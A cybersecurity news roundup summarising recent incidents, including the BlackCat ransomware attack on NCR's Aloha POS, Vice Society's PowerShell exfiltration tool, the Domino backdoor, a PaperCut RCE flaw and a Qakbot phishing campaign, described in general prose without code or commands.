Over the weekend, one of the largest payment solutions providers, NCR, confirmed that the data centers for their Aloha POS (Point of Sale) software had been compromised by a ransomware attack. The BlackCat/ALPHV ransomware group claimed responsibility for the attack and stated that instead of stealing the data stored on the Aloha servers, they had taken all the client credentials, and were expecting a ransom to be paid before posting the full list to their leak site.
Custom PowerShell tool allowing threat actors to silently exfiltrate data
Researchers have identified several instances of the Vice Society ransomware group using a custom PowerShell script to exfiltrate data from a victim’s system without raising any warnings. The script runs a series of jobs to identify files and directories that are on the inclusion list, looking for keywords, and avoiding files smaller than 10KB. By concentrating on a smaller scope of files and criteria, it minimizes the drain on device resources to avoid detection, and only takes data that the threat actors deem valuable.
Domino backdoor draws inspiration from multiple threat groups
A new malicious backdoor has been identified by researchers as ‘Domino’ and appears to have connections to both the FIN7 APT (Advanced Persistent Threat) group and former members of the Conti ransomware group. Domino uses a significant amount of code and functionality from the Lizar malware family, which was originally tied to FIN7 and has been actively deployed for several years. More recently, Domino has been seen using Dave Loader, which has been developed and maintained by former members of the Conti ransomware group to deploy ransomware payloads.
PaperCut software warns users of RCE vulnerability
Officials for the print management software company, PaperCut, have recently begun contacting their customers about a remote code execution (RCE) flaw that could allow network intrusion by hackers. The company is urging all users to update their software to the latest versions, to avoid any unauthorized access, though they also acknowledge that it is up to the system admins to thoroughly investigate their own networks for suspicious activity.
Qakbot campaign uses fake business emails
The latest campaign from the prolific Qakbot banking trojan has been spotted using spoofed business emails to enter an ongoing email thread and begin posting their own messages with malicious PDF attachments. This campaign relies on compromising email threads and using the previous sender’s name but switching out the email address, and then hoping the victim is trusting enough to open the PDF attachment, which launches the malicious scripts. Beyond the email-focus, this campaign of Qakbot remains the same as previous campaigns, by quickly extracting stored credentials and dropping additional malware payloads.
